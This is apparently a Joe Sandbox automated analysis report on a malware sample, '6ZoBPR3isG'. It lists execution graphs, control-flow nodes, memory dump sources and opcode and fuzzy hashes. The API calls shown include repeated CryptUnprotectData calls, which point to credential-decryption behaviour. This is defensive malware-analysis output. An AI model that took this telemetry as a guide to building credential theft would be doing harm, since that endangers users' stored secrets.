                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:10.7%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:2.1%
                                                                                                              Total number of Nodes:283
                                                                                                              Total number of Limit Nodes:23
                                                                                                              execution_graph 54275 371fe028 DuplicateHandle 54276 371fe0be 54275->54276 54277 ad030 54278 ad048 54277->54278 54279 ad0a2 54278->54279 54284 371fd728 54278->54284 54288 371ff010 54278->54288 54299 371fb884 54278->54299 54310 371fd717 54278->54310 54285 371fd74e 54284->54285 54286 371fb884 4 API calls 54285->54286 54287 371fd76f 54286->54287 54287->54279 54291 371ff06d 54288->54291 54289 371ff0a1 54293 371ff09f 54289->54293 54348 371fe484 54289->54348 54291->54289 54292 371ff091 54291->54292 54292->54293 54314 37757604 54292->54314 54320 37757528 54292->54320 54325 37757538 54292->54325 54330 371ff1c5 54292->54330 54339 371ff1c8 54292->54339 54300 371fb88f 54299->54300 54301 371ff0a1 54300->54301 54303 371ff091 54300->54303 54302 371fe484 4 API calls 54301->54302 54304 371ff09f 54301->54304 54302->54304 54303->54304 54305 37757604 4 API calls 54303->54305 54306 371ff1c8 4 API calls 54303->54306 54307 371ff1c5 4 API calls 54303->54307 54308 37757538 4 API calls 54303->54308 54309 37757528 4 API calls 54303->54309 54305->54304 54306->54304 54307->54304 54308->54304 54309->54304 54311 371fd74e 54310->54311 54312 371fb884 4 API calls 54311->54312 54313 371fd76f 54312->54313 54313->54279 54315 377575c2 54314->54315 54316 37757612 54314->54316 54355 377575f0 54315->54355 54361 377575df 54315->54361 54317 377575d8 54317->54293 54322 3775754c 54320->54322 54321 377575d8 54321->54293 54323 377575f0 4 API calls 54322->54323 54324 377575df 4 API calls 54322->54324 54323->54321 54324->54321 54326 3775754c 54325->54326 54328 377575f0 4 API calls 54326->54328 54329 377575df 4 API calls 54326->54329 54327 377575d8 54327->54293 54328->54327 54329->54327 54331 371ff1d6 54330->54331 54332 371ff203 54330->54332 54334 371fe484 4 API calls 54331->54334 54338 371ff1de 54331->54338 54332->54331 54333 371ff208 54332->54333 54404 371fe4a4 54333->54404 54337 371ff21c 54334->54337 54336 371ff214 54336->54293 54337->54293 54338->54293 54340 371ff1d6 54339->54340 54341 371ff203 54339->54341 54343 371fe484 4 API calls 54340->54343 54347 371ff1de 54340->54347 54341->54340 54342 371ff208 54341->54342 54344 371fe4a4 GetCurrentThreadId 54342->54344 54346 371ff21c 54343->54346 54345 371ff214 54344->54345 54345->54293 54346->54293 54347->54293 54349 371fe48f 54348->54349 54350 371ff31c 54349->54350 54351 371ff272 54349->54351 54352 371fb884 3 API calls 54350->54352 54353 371ff2ca CallWindowProcW 54351->54353 54354 371ff279 54351->54354 54352->54354 54353->54354 54354->54293 54356 37757601 54355->54356 54367 377586d7 54355->54367 54373 3775869f 54355->54373 54379 377586cc 54355->54379 54385 377587b0 54355->54385 54356->54317 54362 37757601 54361->54362 54363 377586d7 4 API calls 54361->54363 54364 377587b0 4 API calls 54361->54364 54365 377586cc 4 API calls 54361->54365 54366 3775869f 4 API calls 54361->54366 54362->54317 54363->54362 54364->54362 54365->54362 54366->54362 54368 377586bf 54367->54368 54369 37758770 54368->54369 54371 371fe484 4 API calls 54368->54371 54390 371fe46a 54368->54390 54397 371ff221 54368->54397 54369->54356 54371->54369 54374 377586a4 54373->54374 54375 37758618 54374->54375 54376 371fe46a 4 API calls 54374->54376 54377 371fe484 4 API calls 54374->54377 54378 371ff221 4 API calls 54374->54378 54375->54356 54376->54375 54377->54375 54378->54375 54380 37758755 54379->54380 54381 37758770 54380->54381 54382 371fe46a 4 API calls 54380->54382 54383 371fe484 4 API calls 54380->54383 54384 371ff221 4 API calls 54380->54384 54381->54356 54382->54381 54383->54381 54384->54381 54387 371fe46a 4 API calls 54385->54387 54388 371fe484 4 API calls 54385->54388 54389 371ff221 4 API calls 54385->54389 54386 377587ca 54386->54356 54387->54386 54388->54386 54389->54386 54391 371fe48f 54390->54391 54392 371ff31c 54391->54392 54393 371ff272 54391->54393 54394 371fb884 3 API calls 54392->54394 54395 371ff2ca CallWindowProcW 54393->54395 54396 371ff279 54393->54396 54394->54396 54395->54396 54396->54369 54398 371ff22a 54397->54398 54403 371ff279 54397->54403 54399 371ff31c 54398->54399 54400 371ff272 54398->54400 54401 371fb884 3 API calls 54399->54401 54402 371ff2ca CallWindowProcW 54400->54402 54400->54403 54401->54403 54402->54403 54403->54369 54405 371fe4af 54404->54405 54408 371fe4fc 54405->54408 54407 371ff765 54407->54336 54410 371fe507 54408->54410 54409 371ff8fb 54409->54407 54410->54409 54411 371ff8d1 GetCurrentThreadId 54410->54411 54411->54409 54412 37750448 54414 3775046d 54412->54414 54413 377506ac 54414->54413 54415 37750651 54414->54415 54424 37751a20 54414->54424 54429 37751a12 54414->54429 54416 37750374 OleInitialize 54415->54416 54419 37750681 54415->54419 54416->54419 54419->54413 54434 37750374 54419->54434 54425 37751a41 54424->54425 54426 37751a65 54425->54426 54450 37751bd0 54425->54450 54454 37751bc0 54425->54454 54426->54415 54430 37751a41 54429->54430 54431 37751a65 54430->54431 54432 37751bd0 CreateWindowExW 54430->54432 54433 37751bc0 CreateWindowExW 54430->54433 54431->54415 54432->54431 54433->54431 54436 3775037f 54434->54436 54435 37750699 54439 3775ae98 54435->54439 54445 3775aea8 54435->54445 54436->54435 54504 37759ddc 54436->54504 54438 3775a964 54440 3775ae55 54439->54440 54442 3775aea6 54439->54442 54440->54413 54441 3775af5a 54441->54413 54442->54441 54443 3775b370 WaitMessage 54442->54443 54512 37759ea4 54442->54512 54443->54442 54448 3775af0d 54445->54448 54446 3775b370 WaitMessage 54446->54448 54447 37759ea4 DispatchMessageW 54447->54448 54448->54446 54448->54447 54449 3775af5a 54448->54449 54449->54413 54451 37751bdd 54450->54451 54452 37751c16 54451->54452 54458 377508f4 54451->54458 54452->54426 54455 37751bdd 54454->54455 54456 37751c16 54455->54456 54457 377508f4 CreateWindowExW 54455->54457 54456->54426 54457->54456 54459 377508ff 54458->54459 54461 37751c88 54459->54461 54462 37750928 54459->54462 54463 37750933 54462->54463 54469 37750938 54463->54469 54465 37751cf7 54473 37756be8 54465->54473 54482 37756bd0 54465->54482 54466 37751d31 54466->54461 54470 37750943 54469->54470 54471 37752e98 54470->54471 54472 37751a20 CreateWindowExW 54470->54472 54471->54465 54472->54471 54475 37756c19 54473->54475 54477 37756d19 54473->54477 54474 37756c25 54474->54466 54475->54474 54476 37756c65 54475->54476 54478 37756bd0 CreateWindowExW 54475->54478 54479 37756be8 CreateWindowExW 54475->54479 54491 371fc429 54476->54491 54495 371fc438 54476->54495 54477->54466 54478->54476 54479->54476 54483 37756b55 54482->54483 54484 37756be2 54482->54484 54483->54466 54485 37756c65 54484->54485 54486 37756c25 54484->54486 54487 37756bd0 CreateWindowExW 54484->54487 54488 37756be8 CreateWindowExW 54484->54488 54489 371fc429 CreateWindowExW 54485->54489 54490 371fc438 CreateWindowExW 54485->54490 54486->54466 54487->54485 54488->54485 54489->54486 54490->54486 54492 371fc463 54491->54492 54493 371fc512 54492->54493 54499 371fd510 54492->54499 54496 371fc463 54495->54496 54497 371fc512 54496->54497 54498 371fd510 CreateWindowExW 54496->54498 54498->54497 54500 371fd55d CreateWindowExW 54499->54500 54501 371fd51a 54499->54501 54503 371fd694 54500->54503 54501->54493 54505 37759de7 54504->54505 54507 3775ac5b 54505->54507 54508 37759df8 54505->54508 54507->54438 54509 3775ac90 OleInitialize 54508->54509 54511 3775acf4 54509->54511 54511->54507 54513 3775bfa8 DispatchMessageW 54512->54513 54514 3775c014 54513->54514 54514->54442 54515 36ae8550 54520 36ae855c 54515->54520 54516 36ae858b 54526 371f86c8 54516->54526 54517 36ae8592 54521 36aed690 54520->54521 54522 36aed6ac 54521->54522 54530 36b99aa8 54522->54530 54534 36b99a98 54522->54534 54523 36aed6e2 54523->54516 54527 371f86d4 54526->54527 54566 371f8718 54527->54566 54532 36b99aca 54530->54532 54531 36b99f59 54531->54523 54532->54531 54538 36b9a361 54532->54538 54536 36b99aa2 54534->54536 54535 36b99f59 54535->54523 54536->54535 54537 36b9a361 CryptUnprotectData 54536->54537 54537->54536 54539 36b9a370 54538->54539 54543 36b9a9b0 54539->54543 54551 36b9a9a0 54539->54551 54540 36b9a3e0 54540->54532 54544 36b9a9d5 54543->54544 54545 36b9aa89 54543->54545 54544->54545 54549 36b9a9b0 CryptUnprotectData 54544->54549 54550 36b9a9a0 CryptUnprotectData 54544->54550 54559 36b9ab90 54544->54559 54563 36b9a700 54545->54563 54549->54545 54550->54545 54552 36b9a9d5 54551->54552 54553 36b9aa89 54551->54553 54552->54553 54556 36b9ab90 CryptUnprotectData 54552->54556 54557 36b9a9b0 CryptUnprotectData 54552->54557 54558 36b9a9a0 CryptUnprotectData 54552->54558 54554 36b9a700 CryptUnprotectData 54553->54554 54555 36b9ac55 54554->54555 54555->54540 54556->54553 54557->54553 54558->54553 54560 36b9aba5 54559->54560 54561 36b9a700 CryptUnprotectData 54560->54561 54562 36b9ac55 54561->54562 54562->54545 54564 36b9ae40 CryptUnprotectData 54563->54564 54565 36b9ac55 54564->54565 54565->54540 54567 371f8734 54566->54567 54570 371f97e0 54567->54570 54571 371f97fc 54570->54571 54576 371f5ef4 54571->54576 54573 371f981b 54581 371f5f04 54573->54581 54575 371f86e7 54575->54517 54577 371f5eff 54576->54577 54578 371f98cf 54577->54578 54585 371f9ce1 54577->54585 54589 371f9cf0 54577->54589 54578->54573 54584 371f5f0f 54581->54584 54582 371ff5ac 54582->54582 54584->54582 54607 371fe4dc 54584->54607 54587 371f9cef 54585->54587 54586 371f9da9 54586->54586 54587->54586 54593 371f992c 54587->54593 54591 371f9d07 54589->54591 54590 371f9da9 54590->54590 54591->54590 54592 371f992c 2 API calls 54591->54592 54592->54590 54594 371f9937 54593->54594 54598 371fba08 54594->54598 54599 371fb584 54594->54599 54598->54586 54601 371fb58f 54599->54601 54600 371fb9cf 54600->54598 54604 371fb610 54600->54604 54601->54600 54602 371fc429 CreateWindowExW 54601->54602 54603 371fc438 CreateWindowExW 54601->54603 54602->54600 54603->54600 54605 371ff490 SetTimer 54604->54605 54606 371ff4fc 54605->54606 54606->54598 54608 371fe4e7 54607->54608 54609 371ff70c 54608->54609 54610 371fe4a4 GetCurrentThreadId 54608->54610 54611 371f992c 2 API calls 54609->54611 54610->54609 54612 371ff715 54611->54612 54612->54582 54613 371fdde0 54614 371fde26 GetCurrentProcess 54613->54614 54616 371fde78 GetCurrentThread 54614->54616 54617 371fde71 54614->54617 54618 371fdeae 54616->54618 54619 371fdeb5 GetCurrentProcess 54616->54619 54617->54616 54618->54619 54622 371fdeeb 54619->54622 54620 371fdf13 GetCurrentThreadId 54621 371fdf44 54620->54621 54622->54620

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 691 3775aea8-3775af0b 692 3775af0d-3775af37 691->692 693 3775af3a-3775af58 691->693 692->693 698 3775af61-3775af98 693->698 699 3775af5a-3775af5c 693->699 703 3775af9e-3775afb2 698->703 704 3775b3c9 698->704 701 3775b41a-3775b42f 699->701 705 3775afb4-3775afde 703->705 706 3775afe1-3775b000 703->706 707 3775b3ce-3775b3e4 704->707 705->706 713 3775b002-3775b008 706->713 714 3775b018-3775b01a 706->714 707->701 716 3775b00c-3775b00e 713->716 717 3775b00a 713->717 718 3775b01c-3775b034 714->718 719 3775b039-3775b042 714->719 716->714 717->714 718->707 720 3775b04a-3775b051 719->720 721 3775b053-3775b059 720->721 722 3775b05b-3775b062 720->722 723 3775b06f-3775b08c call 37759e58 721->723 724 3775b064-3775b06a 722->724 725 3775b06c 722->725 728 3775b1e1-3775b1e5 723->728 729 3775b092-3775b099 723->729 724->723 725->723 731 3775b3b4-3775b3c7 728->731 732 3775b1eb-3775b1ef 728->732 729->704 730 3775b09f-3775b0dc 729->730 740 3775b0e2-3775b0e7 730->740 741 3775b3aa-3775b3ae 730->741 731->707 733 3775b1f1-3775b204 732->733 734 3775b209-3775b212 732->734 733->707 735 3775b214-3775b23e 734->735 736 3775b241-3775b248 734->736 735->736 738 3775b2e7-3775b2fc 736->738 739 3775b24e-3775b255 736->739 738->741 753 3775b302-3775b304 738->753 743 3775b284-3775b2a6 739->743 744 3775b257-3775b281 739->744 745 3775b119-3775b12e call 37759e7c 740->745 746 3775b0e9-3775b0f7 call 37759e64 740->746 741->720 741->731 743->738 781 3775b2a8-3775b2b2 743->781 744->743 751 3775b133-3775b137 745->751 746->745 756 3775b0f9-3775b117 call 37759e70 746->756 757 3775b139-3775b14b call 37759e88 751->757 758 3775b1a8-3775b1b5 751->758 759 3775b306-3775b33f 753->759 760 3775b351-3775b36e call 37759e58 753->760 756->751 784 3775b14d-3775b17d 757->784 785 3775b18b-3775b1a3 757->785 758->741 773 3775b1bb-3775b1c5 call 37759e98 758->773 776 3775b341-3775b347 759->776 777 3775b348-3775b34f 759->777 760->741 772 3775b370-3775b39c WaitMessage 760->772 778 3775b3a3 772->778 779 3775b39e 772->779 787 3775b1d4-3775b1dc call 37759eb0 773->787 788 3775b1c7-3775b1ca call 37759ea4 773->788 776->777 777->741 778->741 779->778 792 3775b2b4-3775b2ba 781->792 793 3775b2ca-3775b2e5 781->793 799 3775b184 784->799 800 3775b17f 784->800 785->707 787->741 795 3775b1cf 788->795 797 3775b2bc 792->797 798 3775b2be-3775b2c0 792->798 793->738 793->781 795->741 797->793 798->793 799->785 800->799
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 2061451462-2188043875
                                                                                                              • Opcode ID: 55954127cbc5bbd63a39966ee1c4e1340689d80ae80a0b0014446118012d21f7
                                                                                                              • Instruction ID: 1420077051355b58890975203b4970e756777338192b71eb726f048c7e834bd9
                                                                                                              • Opcode Fuzzy Hash: 55954127cbc5bbd63a39966ee1c4e1340689d80ae80a0b0014446118012d21f7
                                                                                                              • Instruction Fuzzy Hash: EFF13A75A00309CFEB04CFA5C848BADBBB2FF48324F158569E405AF2A5DB74A945CF81

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 875 36b9a700-36b9aeb2 CryptUnprotectData 877 36b9aebb-36b9aee3 875->877 878 36b9aeb4-36b9aeba 875->878 878->877
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36B9AEA5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 834300711-2188043875
                                                                                                              • Opcode ID: e7f5d1fefa25037a20cba3d7c345b42ccac3f6f210e79ebd5dc9bbd94f88e564
                                                                                                              • Instruction ID: 5a16bf57448d6262cfce1a3319f572139cb5bbf8ee2181eef8bfa832427c24b4
                                                                                                              • Opcode Fuzzy Hash: e7f5d1fefa25037a20cba3d7c345b42ccac3f6f210e79ebd5dc9bbd94f88e564
                                                                                                              • Instruction Fuzzy Hash: 15112976800749DFDB10CF9AC844BDEBBF4EF48310F24842AE958A7250C379A951DFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 881 36b9ae39-36b9aeb2 CryptUnprotectData 882 36b9aebb-36b9aee3 881->882 883 36b9aeb4-36b9aeba 881->883 883->882
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36B9AEA5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID: Z/Kq
                                                                                                              • API String ID: 834300711-2188043875
                                                                                                              • Opcode ID: cc521966cd7ff7eebdb5922881e3e863dcc226804562f978c394aee9f99c22db
                                                                                                              • Instruction ID: 9f22bfa0c40ffe16170ae01e3003f7b1f2fc942f0f31998d42b73887a335f2bb
                                                                                                              • Opcode Fuzzy Hash: cc521966cd7ff7eebdb5922881e3e863dcc226804562f978c394aee9f99c22db
                                                                                                              • Instruction Fuzzy Hash: D411797680024ADFDB10CFA6C844BDEBFF5EF48320F24846AE958A7650C379A550CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf35d7e4fa03a1187a4addca63dea622877da25cabe77a680ed1559ca2af41c5
                                                                                                              • Instruction ID: a6c7646466087b19a70c5db1381e2aba4668b3daff5d96394cb01dd7c634aef8
                                                                                                              • Opcode Fuzzy Hash: cf35d7e4fa03a1187a4addca63dea622877da25cabe77a680ed1559ca2af41c5
                                                                                                              • Instruction Fuzzy Hash: 00826F74A00219CFEB04DFA5C894A9EBBF2BF88344F658169E845EB361DB30DD51DB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 703e4a1dc9ff7dafc53ce640c12de6f09c55508afc853a585171a7798592e2d5
                                                                                                              • Instruction ID: 3f9aead94fb1f37fa584aa2ad0964515b40c67fda90e99f43bab45371acd1272
                                                                                                              • Opcode Fuzzy Hash: 703e4a1dc9ff7dafc53ce640c12de6f09c55508afc853a585171a7798592e2d5
                                                                                                              • Instruction Fuzzy Hash: F682A174A04205DFDB05CFA9C994A9EBBF6FF88300F158569E805DB3A1DB31E951CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 460babb3efc8f85913096ab9d85f2a5424666648aaab4526b9119ee88883cbce
                                                                                                              • Instruction ID: 58b0b59d94c9c52bb9fcb8f0c61283361699591fb0729e5a71d3dc91522b0f3d
                                                                                                              • Opcode Fuzzy Hash: 460babb3efc8f85913096ab9d85f2a5424666648aaab4526b9119ee88883cbce
                                                                                                              • Instruction Fuzzy Hash: 3B82B274A05229CFEB25DF64D994BADB7B2FB89300F1081E9D409673A0DB319E92CF54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aa49d3863993b81347d59eb4a2c06f27dd006bb42f77f6e1cd22f70db7f7151e
                                                                                                              • Instruction ID: 76372e42f46150ba7f2041008ebfd2dfed8dd27724a1f3f9720d94db4119a216
                                                                                                              • Opcode Fuzzy Hash: aa49d3863993b81347d59eb4a2c06f27dd006bb42f77f6e1cd22f70db7f7151e
                                                                                                              • Instruction Fuzzy Hash: EC72B274A05228CFEB25DF64D994BA9B7B2FB89300F1081E9D409773A0DB319E92DF54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7a82806c4c938b802ad9760efc689ddd225511dfc2f16fd445741009ca3217ab
                                                                                                              • Instruction ID: 9078034d95003e8a5772c48493eeb9d662b85be3f340d4621dd4288980cf7704
                                                                                                              • Opcode Fuzzy Hash: 7a82806c4c938b802ad9760efc689ddd225511dfc2f16fd445741009ca3217ab
                                                                                                              • Instruction Fuzzy Hash: 2F72CD75E05228CFEB65DF65C980BDDBBB2BB49300F5082E9D409A7255EB31AE81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c26af80035ec18e7a27893d7af45315c3b87e71819db07601b52b08b528b09d
                                                                                                              • Instruction ID: 21715ade458473754b514160f24168b519923d2590c8531a18a3eae4a4d12665
                                                                                                              • Opcode Fuzzy Hash: 6c26af80035ec18e7a27893d7af45315c3b87e71819db07601b52b08b528b09d
                                                                                                              • Instruction Fuzzy Hash: 6DD1D234A007059FDB01CFAAC880A9ABBB6FF85350F5585AADC58DB351DB31EC05CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 247d5105251397d532bf5ee35134b9a6861771128157debfbf420535e6fc8e09
                                                                                                              • Instruction ID: 29f5b1af41916cc5ed1d32ae265cb1c2c4d2a92f9c5550353dca3b67365620f3
                                                                                                              • Opcode Fuzzy Hash: 247d5105251397d532bf5ee35134b9a6861771128157debfbf420535e6fc8e09
                                                                                                              • Instruction Fuzzy Hash: 31E13935600B049FD725CB69C884BDBB7E6FF88314F198A28D59E8B255DB30F865CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5a7a7f7d4b13e3506071a6c32dd0323133e046c4430a2b79281c801a79791ada
                                                                                                              • Instruction ID: 1ca23208a7e9522d449de425a51fabc34200952eff4a4a5fb70d7cb991fdad36
                                                                                                              • Opcode Fuzzy Hash: 5a7a7f7d4b13e3506071a6c32dd0323133e046c4430a2b79281c801a79791ada
                                                                                                              • Instruction Fuzzy Hash: 80E1BD74E01218CFEB64DFA5C994BDDBBB2BF89304F2081A9D408B7290DB359A85CF15
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 531ab632ace4fbf6d4f10bcf866df47493b39cc8e099efcca8e50bf51dad877d
                                                                                                              • Instruction ID: 93e96af4b01ea4c794714692683f870c032783fd2658f55ed5760f61553e7592
                                                                                                              • Opcode Fuzzy Hash: 531ab632ace4fbf6d4f10bcf866df47493b39cc8e099efcca8e50bf51dad877d
                                                                                                              • Instruction Fuzzy Hash: A3C19F74E00218CFEB14DFA5D994B9DBBF2BF89304F2081A9D409AB395DB359A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f5e25d7e78e9e4a18a29a895e39c40de29f24344d548d61f4fbb8dadc6656ea6
                                                                                                              • Instruction ID: 1686efffe9dd52da960169306ab40b9cdd58231f7e0cee6510cebdc965f9496b
                                                                                                              • Opcode Fuzzy Hash: f5e25d7e78e9e4a18a29a895e39c40de29f24344d548d61f4fbb8dadc6656ea6
                                                                                                              • Instruction Fuzzy Hash: 35C19074E00218CFEB14DFA5D954B9DBBB2FF89304F2081A9D809AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 53d015e35303660639670e65d487d9bbc662461c9093f0ce1e6ba1ff17182db7
                                                                                                              • Instruction ID: f9f053b90cf7a5f2b76029fe1f763ed69899c3214b34cccdc409308d6437bd30
                                                                                                              • Opcode Fuzzy Hash: 53d015e35303660639670e65d487d9bbc662461c9093f0ce1e6ba1ff17182db7
                                                                                                              • Instruction Fuzzy Hash: EFA1F174D00218CFEB14DFA5C984BDDBBB2FF89314F208269E409AB291DB749989CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c16be2a974359ce021cacecc10f8bd9d4dd751f376420f69aadf51e018e66b8a
                                                                                                              • Instruction ID: 414c48895fea5966be5645fef6e8caaf3d63702c96767e7e5380577ec4df3b53
                                                                                                              • Opcode Fuzzy Hash: c16be2a974359ce021cacecc10f8bd9d4dd751f376420f69aadf51e018e66b8a
                                                                                                              • Instruction Fuzzy Hash: 8D91EE74D00218CFEB10DFA9C988B9DFBB1FF49314F208269E409AB2A1DB749985CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
